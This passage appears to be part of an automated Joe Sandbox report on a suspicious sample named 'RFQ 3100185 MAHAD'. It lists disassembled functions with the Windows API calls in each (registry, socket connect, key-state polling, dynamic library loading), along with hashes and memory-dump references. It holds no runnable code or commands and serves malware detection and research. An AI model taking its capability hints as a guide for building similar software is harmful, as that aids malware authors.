                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                            • String ID:
                                                            • API String ID: 2364364464-0
                                                            • Opcode ID: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                            • Instruction ID: 7334b9223880aa48a7b81f62b130f5909f7bc2dee2b8f7490d8f0a88fa300ffe
                                                            • Opcode Fuzzy Hash: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                            • Instruction Fuzzy Hash: D0813270600214EBDF119F64C88AFADBBE9FF44720F14845DFA15AF382D7B9A9418B90
                                                            APIs
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0081E1D5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0081E20D
                                                            • IsDlgButtonChecked.USER32(?,00000001), ref: 0081E248
                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0081E269
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0081E281
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ButtonCheckedLongWindow
                                                            • String ID:
                                                            • API String ID: 3188977179-0
                                                            • Opcode ID: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
                                                            • Instruction ID: 03cee31f65778f113116dd5f2b5313765cb56bf32c0f9cdeaa48473e7d1b4890
                                                            • Opcode Fuzzy Hash: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
                                                            • Instruction Fuzzy Hash: 24619A34A00608AFDB258F58C899FEA77BEFF99301F148099FD59D72A1C770A990CB10
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 007F1CB4
                                                            • VariantClear.OLEAUT32(00000013), ref: 007F1D26
                                                            • VariantClear.OLEAUT32(00000000), ref: 007F1D81
                                                            • VariantClear.OLEAUT32(?), ref: 007F1DF8
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007F1E26
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType
                                                            • String ID:
                                                            • API String ID: 4136290138-0
                                                            • Opcode ID: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
                                                            • Instruction ID: 32f33969498130d720b13e999e1f0dec958533404f137fd6afe0eaab9ac7ea99
                                                            • Opcode Fuzzy Hash: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
                                                            • Instruction Fuzzy Hash: 1E514AB5A00209EFDB14CF58D880AAAB7B8FF8C314F158559EA59DB305D334E951CFA0
                                                            APIs
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008106EE
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0081077D
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0081079B
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008107E1
                                                            • FreeLibrary.KERNEL32(00000000,00000004), ref: 008107FB
                                                              • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007FA574,?,?,00000000,00000008), ref: 007CE675
                                                              • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007FA574,?,?,00000000,00000008), ref: 007CE699
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 327935632-0
                                                            • Opcode ID: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
                                                            • Instruction ID: ce5af871141e1a13ecad7214882b332671e6cec1f1328297eb844968de180de4
                                                            • Opcode Fuzzy Hash: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
                                                            • Instruction Fuzzy Hash: 60512775A00209DFCB10EFA8C889AEDB7B9FF48310B148459EA15EB351DB75AD85CF90
                                                            APIs
                                                              • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812EEF
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00812F2E
                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00812F75
                                                            • RegCloseKey.ADVAPI32(?,?), ref: 00812FA1
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00812FAE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                            • String ID:
                                                            • API String ID: 3740051246-0
                                                            • Opcode ID: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
                                                            • Instruction ID: 73a65a24aa892a1be11b40f7a82e20011031d347f523bbfbd9df8556efae6c5f
                                                            • Opcode Fuzzy Hash: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
                                                            • Instruction Fuzzy Hash: DB514672208208EFD715EB64C895FAAB7F9FF88704F00881DF595872A1EB34E955CB52
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
                                                            • Instruction ID: ec6c3923b9554fe7798edcd7e3551f473fc8d31bada492013abad76daeb906b2
                                                            • Opcode Fuzzy Hash: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
                                                            • Instruction Fuzzy Hash: 7441A179940248AFCB20DB68DC48FE9BB6CFF49310F140265E959E72E1C730AD91DA90
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008012B4
                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008012DD
                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0080131C
                                                              • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                              • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00801341
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00801349
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 1389676194-0
                                                            • Opcode ID: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
                                                            • Instruction ID: 0af7c9fb86586e37381867a3f0dfb3288cd9a4795ed3be1b2651ea76dfa6fbce
                                                            • Opcode Fuzzy Hash: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
                                                            • Instruction Fuzzy Hash: 00412D35A00205DFCF01EF64C995AAEBBF5FF48314B158099E90AAB3A2CB35ED01DB50
                                                            APIs
                                                            • GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                            • ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                            • GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                            • GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorScreen
                                                            • String ID:
                                                            • API String ID: 4210589936-0
                                                            • Opcode ID: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
                                                            • Instruction ID: 76de36469cf1b4943783a05a3e7059262447f54534175e522e8b899a06012678
                                                            • Opcode Fuzzy Hash: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
                                                            • Instruction Fuzzy Hash: 9B416A75604219FBCF159F68C845EE9BBB4FF05324F20431AF829A6290CB34A994DFA1
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 007EB369
                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 007EB413
                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007EB41B
                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 007EB429
                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007EB431
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessagePostSleep$RectWindow
                                                            • String ID:
                                                            • API String ID: 3382505437-0
                                                            • Opcode ID: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
                                                            • Instruction ID: 66cfd42fa4e79c8516fc03d74e5270001c67439dc4a91e0f45b56a0c83bebc5d
                                                            • Opcode Fuzzy Hash: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
                                                            • Instruction Fuzzy Hash: C931DCB1901259EBDF00CFA9D94EA9E7FB5FB48319F104229F820AA1D1C3B49910CB90
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 007EDBD7
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007EDBF4
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007EDC2C
                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007EDC52
                                                            • _wcsstr.LIBCMT ref: 007EDC5C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                            • String ID:
                                                            • API String ID: 3902887630-0
                                                            • Opcode ID: c8fb6f18983086ff08e53a9ee1d9b582945301a86c54e2f7c1ffddf518c976df
                                                            • Instruction ID: 5d91142a358a68640bd1b53ad22eaf82a281609d203e8c2bbec34d02f46fc760
                                                            • Opcode Fuzzy Hash: c8fb6f18983086ff08e53a9ee1d9b582945301a86c54e2f7c1ffddf518c976df
                                                            • Instruction Fuzzy Hash: 64212C71205244BFEB255F36EC49E7B7BA9EF49750F20403DF909CA151EAA9DC01D2B0
                                                            APIs
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007EBC90
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBCC2
                                                            • __itow.LIBCMT ref: 007EBCDA
                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBD00
                                                            • __itow.LIBCMT ref: 007EBD11
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$__itow
                                                            • String ID:
                                                            • API String ID: 3379773720-0
                                                            • Opcode ID: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                            • Instruction ID: 8dc93616f99b5966eb13bfd900b19f98dd4e6a373e74fa02cfc01b9af2ab2d21
                                                            • Opcode Fuzzy Hash: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                            • Instruction Fuzzy Hash: 8C21D47170160CBADB10AE669C8AFDF7E68AF9D310F100465FA05EB181EB788D0583A1
                                                            APIs
                                                              • Part of subcall function 007B50E6: _wcsncpy.LIBCMT ref: 007B50FA
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,007F60C3), ref: 007F6369
                                                            • GetLastError.KERNEL32(?,?,?,007F60C3), ref: 007F6374
                                                            • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F6388
                                                            • _wcsrchr.LIBCMT ref: 007F63AA
                                                              • Part of subcall function 007F6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F63E0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                            • String ID:
                                                            • API String ID: 3633006590-0
                                                            • Opcode ID: 02e0c0790e41bd4de27248d449baaca43f87e3b85a61bc614b6f809975af0c2e
                                                            • Instruction ID: 11399b72ff16d38e64a2c50192da8ecee3b915aaca81d27af8884f2d1c94aae5
                                                            • Opcode Fuzzy Hash: 02e0c0790e41bd4de27248d449baaca43f87e3b85a61bc614b6f809975af0c2e
                                                            • Instruction Fuzzy Hash: BE21273190421DDBDF15AB78AC46FFA33ACEF15360F10046AF215D32C0EB68D9858A65
                                                            APIs
                                                              • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00808BD3
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00808BE2
                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00808BFE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastconnectinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 3701255441-0
                                                            • Opcode ID: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                            • Instruction ID: 48c2ce324a6f9a690ab8b0861deb1816f3278ec501784316b11c9f860cd41944
                                                            • Opcode Fuzzy Hash: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                            • Instruction Fuzzy Hash: 11216D312002189FDB50AB68DD89F7E77A9FF88720F044859F956EB2D2CE74A8418B61
                                                            APIs
                                                            • IsWindow.USER32(00000000), ref: 00808441
                                                            • GetForegroundWindow.USER32 ref: 00808458
                                                            • GetDC.USER32(00000000), ref: 00808494
                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 008084A0
                                                            • ReleaseDC.USER32(00000000,00000003), ref: 008084DB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Window$ForegroundPixelRelease
                                                            • String ID:
                                                            • API String ID: 4156661090-0
                                                            • Opcode ID: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                            • Instruction ID: 2ad4ad6e128d28d077faa5768929279baafed1b351e9446e9a8243d3c5cc3a9b
                                                            • Opcode Fuzzy Hash: 0ec8c690acddd89e65e47227163328ebb0e278e1a8446f997e8504a60c10ac13
                                                            • Instruction Fuzzy Hash: 85216275A00204EFD710DFA4DD49AAEB7E5FF88301F148879E959D7252DB74AD40CBA0
                                                            APIs
                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 007CAFE3
                                                            • SelectObject.GDI32(?,00000000), ref: 007CAFF2
                                                            • BeginPath.GDI32(?), ref: 007CB009
                                                            • SelectObject.GDI32(?,00000000), ref: 007CB033
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: ObjectSelect$BeginCreatePath
                                                            • String ID:
                                                            • API String ID: 3225163088-0
                                                            • Opcode ID: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                            • Instruction ID: 9d9b0211bbaab64072db0cf926fed3397ecda81f421014c65a4563301a2eb0ac
                                                            • Opcode Fuzzy Hash: 6142f965b26674b7dfb6d68e6098694ada8f30c7c0396a563d445e6b0b7bd517
                                                            • Instruction Fuzzy Hash: BF217FB0800309EFDF10DF69EC4DB9A7B68BB60356F14421EF429961B4D37488D9DB91
                                                            APIs
                                                            • __calloc_crt.LIBCMT ref: 007D21A9
                                                            • CreateThread.KERNEL32(?,?,007D22DF,00000000,?,?), ref: 007D21ED
                                                            • GetLastError.KERNEL32 ref: 007D21F7
                                                            • _free.LIBCMT ref: 007D2200
                                                            • __dosmaperr.LIBCMT ref: 007D220B
                                                              • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 2664167353-0
                                                            • Opcode ID: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                            • Instruction ID: 1f5d05f269fd8319c24147ddbd19705c58cda80ab9fed8b53dfaa0e60029255f
                                                            • Opcode Fuzzy Hash: af0b94cc47bdb0963e26a7e6b0f3eb7505e46e8e755e366dbb28679af47b549f
                                                            • Instruction Fuzzy Hash: 6611E533204306AF9B15AF65DC45D9B37B8FF50760710442BF91486342FB39981386B0
                                                            APIs
                                                            • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                            • GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                            • HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                            • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
